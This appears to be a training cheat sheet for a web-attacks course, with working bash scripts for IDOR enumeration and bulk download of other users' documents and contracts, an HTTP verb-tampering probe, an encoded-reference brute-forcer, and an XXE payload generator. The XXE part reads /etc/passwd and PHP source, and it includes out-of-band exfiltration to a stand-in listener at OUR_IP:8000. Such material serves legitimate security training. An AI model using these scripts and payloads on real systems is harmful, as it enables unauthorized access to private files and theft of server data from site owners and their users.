# IDOR

```bash
#!/bin/bash
# Retrieve documents: walk over user IDs, scrape the PDF links from each
# user's documents page and download every file found.

url="http://SERVER_IP:PORT"

for i in {1..10}; do
        # the regex captures links of the form /documents/...pdf
        for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
                wget -q "$url$link"
        done
done
```

The contract references are not plain IDs but `md5(base64(id))`. Reproduce one, then the whole range:

```bash
# base64-encode the id, then MD5 the encoded string
echo -n 1 | base64 -w 0 | md5sum
# cdd96d3cc73d1dbdaffa03cc6cd7339b  -

# same chain for ids 1-10; tr strips the "  -" suffix md5sum appends
for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done
```

```bash
#!/bin/bash
# Download contracts: rebuild each encoded reference and POST it to download.php.
# -O saves to a file, -J names it from the Content-Disposition header.

for i in {1..10}; do
    hash=$(echo -n $i | base64 -w 0 | md5sum | tr -d ' -')
    curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php
done
```

## Cheat Sheet

The cheat sheet is a command reference for the Web Attacks module.

### HTTP Verb Tampering

`HTTP Method`

* `HEAD`
* `PUT`
* `DELETE`
* `OPTIONS`
* `PATCH`

| **Command**  | **Description**           |
| ------------ | ------------------------- |
| `-X OPTIONS` | Set HTTP Method with Curl |
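
Verb tampering is found by sending the same request with each method and watching for a response that differs from the baseline, typically a 401/403 on GET that turns into a 200 on HEAD or OPTIONS because the access control was bound to specific verbs. The script below is an added example, not part of the original page; it assumes `curl` is installed and takes a hypothetical target URL as its argument. Note that HEAD is sent with `-I` rather than `-X HEAD`, since `-X HEAD` makes curl wait for a body that never arrives.

```bash
#!/bin/bash
# Added example: probe one URL with several HTTP methods and flag the ones whose
# status code differs from the GET baseline (bypass candidates).
# Assumes curl is installed; the target URL is a hypothetical caller-supplied value.

VERBS="GET POST HEAD PUT DELETE OPTIONS PATCH"

# Return the HTTP status code curl receives for one method against one URL.
# HEAD uses -I: with "-X HEAD" curl still expects a response body and hangs.
curl_status() {
    local verb=$1 url=$2
    if [ "$verb" = HEAD ]; then
        curl -s -m 10 -o /dev/null -w '%{http_code}' -I "$url"
    else
        curl -s -m 10 -o /dev/null -w '%{http_code}' -X "$verb" "$url"
    fi
}

# Print "VERB STATUS" per method, appending DIFFERS when the code is not the
# same one GET received.
scan_verbs() {
    local url=$1 baseline verb code
    baseline=$(curl_status GET "$url")
    for verb in $VERBS; do
        code=$(curl_status "$verb" "$url")
        if [ "$code" != "$baseline" ]; then
            echo "$verb $code DIFFERS"
        else
            echo "$verb $code"
        fi
    done
}

# Number of methods that answered differently from GET
count_bypass_candidates() {
    scan_verbs "$1" | grep -c DIFFERS
}

# Usage: ./verbs.sh http://SERVER_IP:PORT/admin/
if [ -n "${1:-}" ]; then
    scan_verbs "$1"
fi
```

`curl_status` is the only function that touches the network, so it can be replaced with a stub to exercise the comparison logic offline, and a DIFFERS line is a lead to confirm by hand, not proof of a bypass: servers routinely return 405 for unsupported methods, which is a difference without any security impact.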

### IDOR

`Identify IDORs`

* In `URL parameters & APIs`
* In `AJAX Calls`
* By `understanding reference hashing/encoding`
* By `comparing user roles`

| **Command** | **Description**        |
| ----------- | ---------------------- |
| `md5sum`    | MD5 hash a string      |
| `base64`    | Base64 encode a string |
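
The page's `md5(base64(id))` case is one of several encoding chains developers use to disguise sequential IDs. The script below is an added example, not part of the original page: given a reference captured from a request, it tries a handful of common chains over a small ID range and reports which one reproduces it, then generates the references for a whole range once the chain is known. It assumes GNU coreutils (`base64`, `md5sum`, `sha1sum`, `sha256sum`, `seq`); the scheme names are this script's own labels.

```bash
#!/bin/bash
# Added example: identify and reproduce an encoded object reference.
# Assumes GNU coreutils. Scheme names below are this script's own labels.

SCHEMES="md5 sha1 sha256 base64 md5-of-base64 sha1-of-base64"

# Encode one id with one scheme and print the bare digest/string.
# printf '%s' is used instead of echo -n so no newline sneaks into the hash.
encode_ref() {
    local id=$1 scheme=$2 out
    case "$scheme" in
        md5)            out=$(printf '%s' "$id" | md5sum) ;;
        sha1)           out=$(printf '%s' "$id" | sha1sum) ;;
        sha256)         out=$(printf '%s' "$id" | sha256sum) ;;
        base64)         out=$(printf '%s' "$id" | base64 | tr -d '\n') ;;
        md5-of-base64)  out=$(printf '%s' "$id" | base64 | tr -d '\n' | md5sum) ;;
        sha1-of-base64) out=$(printf '%s' "$id" | base64 | tr -d '\n' | sha1sum) ;;
        *) return 1 ;;
    esac
    # the *sum tools print "<digest>  -"; keep only the digest
    echo "${out%% *}"
}

# Search ids 1..max under every scheme for the captured reference.
# Prints "id scheme" for the first hit, returns 1 when nothing matches.
find_ref() {
    local target=$1 max=${2:-100} id scheme
    for scheme in $SCHEMES; do
        for id in $(seq 1 "$max"); do
            if [ "$(encode_ref "$id" "$scheme")" = "$target" ]; then
                echo "$id $scheme"
                return 0
            fi
        done
    done
    return 1
}

# With the scheme known, emit "id reference" pairs for a range of ids,
# ready to feed into a download loop such as the contracts script above.
enumerate_refs() {
    local scheme=$1 from=$2 to=$3 id
    for id in $(seq "$from" "$to"); do
        echo "$id $(encode_ref "$id" "$scheme")"
    done
}

# Usage: ./refs.sh cdd96d3cc73d1dbdaffa03cc6cd7339b
if [ -n "${1:-}" ]; then
    find_ref "$1" 100 || echo "no match for $1 in ids 1-100"
fi
```

A match in a small ID range is the real finding here: it shows the reference is derived from a guessable value rather than a random token, so hashing it added no authorization. Extend `SCHEMES` with whatever the application's client-side code suggests, and widen the range only after confirming the scheme, since each probe spawns a few processes.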

### XXE

| **Code**                                                                           | **Description**                                |
| ---------------------------------------------------------------------------------- | ---------------------------------------------- |
| `<!ENTITY xxe SYSTEM "http://localhost/email.dtd">`                                | Define External Entity to a URL                |
| `<!ENTITY xxe SYSTEM "file:///etc/passwd">`                                        | Define External Entity to a file path          |
| `<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">` | Read PHP source code with base64 encode filter |
| `<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">`        | Reading a file through a PHP error             |
| `<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">`  | Reading a file OOB exfiltration                |
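
The last two rows of the table are fragments of an external DTD: on their own they do nothing, because `%file;` has to be declared in the same DTD and the wrapper entity (`%error;` or `%oob;`) has to be referenced from the document that loads it. The generator below is an added example, not part of the original page, that assembles complete payloads around those rows. It assumes a hypothetical listener at `OUR_IP:8000` serving `xxe.dtd`, a target that reflects an `<email>` element for the in-band case, and `xmllint` for the optional local check.

```bash
#!/bin/bash
# Added example: build complete XXE documents around the entity definitions
# from the cheat sheet. Listener host/port and the <email> element are
# hypothetical values for illustration.

# In-band XXE: the entity is expanded inside an element the application
# reflects, so the file content comes back in the normal response.
inband_payload() {
    local path=${1:-/etc/passwd}
    cat <<EOF
<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY xxe SYSTEM "file://$path">
]>
<email>&xxe;</email>
EOF
}

# External DTD for the blind cases (served as xxe.dtd on our listener).
# %file; holds the content; the wrapper entity embeds it either in a system
# id that breaks (error mode) or in a URL to our host (oob mode). The OOB
# variant uses the base64 filter because raw newlines would break the URL.
blind_dtd() {
    local path=$1 mode=$2 listener=$3
    case "$mode" in
        error)
            echo "<!ENTITY % file SYSTEM \"file://$path\">"
            echo "<!ENTITY % error \"<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>\">"
            ;;
        oob)
            echo "<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=$path\">"
            echo "<!ENTITY % oob \"<!ENTITY content SYSTEM 'http://$listener/?content=%file;'>\">"
            ;;
        *) return 1 ;;
    esac
}

# Document sent to the target: fetch the DTD from our listener, then trigger
# the wrapper entity; &content; forces the resulting entity to be resolved.
blind_payload() {
    local mode=$1 listener=$2
    cat <<EOF
<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY % remote SYSTEM "http://$listener/xxe.dtd">
  %remote;
  %$mode;
]>
<email>&content;</email>
EOF
}

# Optional local check of the in-band case: xmllint --noent substitutes
# external entities the way a libxml-based parser with entities enabled does.
local_check() {
    local path=${1:-/etc/hostname} tmp
    command -v xmllint >/dev/null || { echo "xmllint not installed"; return 2; }
    tmp=$(mktemp)
    inband_payload "$path" > "$tmp"
    xmllint --noent "$tmp"
    rm -f "$tmp"
}

# Usage:
#   ./xxe.sh dtd oob /etc/passwd OUR_IP:8000   > xxe.dtd
#   ./xxe.sh xml oob OUR_IP:8000               > request.xml
case "${1:-}" in
    dtd)   blind_dtd "$3" "$2" "$4" ;;
    xml)   blind_payload "$2" "$3" ;;
    check) local_check "$2" ;;
esac
```

The parameter entity references inside the `% error` and `% oob` values are expanded when the external DTD is parsed, which is exactly why these two rows must live in the served DTD and not in the document's internal subset, where such references are not allowed. In error mode the file content surfaces in the parser's "failed to load external entity" message, so it only works when the application returns parsing errors; otherwise fall back to the OOB variant and read the base64 from the listener's access log.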
